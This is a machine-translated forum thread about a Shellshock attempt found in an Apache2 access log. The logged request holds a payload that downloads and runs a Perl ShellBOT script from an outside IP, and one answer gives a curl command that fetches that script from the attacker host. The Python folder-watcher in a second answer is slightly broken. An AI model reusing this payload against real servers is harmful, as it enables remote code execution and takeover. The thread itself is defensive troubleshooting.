已经提出了类似的问题,但它们要么对我不起作用,要么我不理解答案。
我运行Apache2网络服务器并托管一些小型个人网站。我正在 cyberstalked ,或者有人试图破解我。
Apache2访问日志显示
195.154.80.205 - - [05 / Nov / 2015:09:57:09 +0000]" GET /info.cgi HTTP / 1.1" 404 464" - " "(){:;}; / usr / bin / perl -e' print \" Content-Type:text / plain \ r \ n \ r \ n&nXSUCCESS!\" ; system(\" wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf / tmp / cox.pl * \&#34);'"
显然正在尝试(在我的日志中一遍又一遍)强制我的服务器下载' cox.pl'然后运行' cox.pl'然后删除' cox.pl'。
我真的想知道cox.pl
中哪些内容可能是github上的Cox-Data-Usage的修改版本。
我想要一个不断监视我的{{1}}文件夹的脚本,当添加新文件时,将该文件复制到另一个目录,以便我查看它正在做什么,或者至少尝试做什么。
我知道我可以拒绝访问等但我想知道这些黑客正在尝试做什么,看看我是否可以收集有关他们的情报。
答案 0 :(得分:1)
有问题的脚本可以轻松下载,它包含ShellBOT by: devil__
所以......猜测; - )
您可以使用tutorial_notifier.py中的pyinotify,但不需要这种特殊情况。只是做
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
检查脚本。
对于Linux 2.4.17 - 2.6.17以及可能是BSD *来说,它看起来像是一套很好的黑客攻击,对我来说并不是无害的,与IRC有关。它与Cox-Data-Usage无关。答案 1 :(得分:0)
我得到了解决方案,
这里是代码
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
after = dict ([(f, None) for f in os.listdir (path_to_watch)])
added = [f for f in after if not f in before]
if added:
print("Added: ", ", ".join (added))
break
else:
before = after
我已编辑代码,原始代码可在 http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
原始代码是用python 2x制作的,所以你需要在python 3中转换它。
注意:-
每当您在 PATH 中添加任何文件时,它都会打印文本并中断,如果未添加任何文件,则它会继续运行。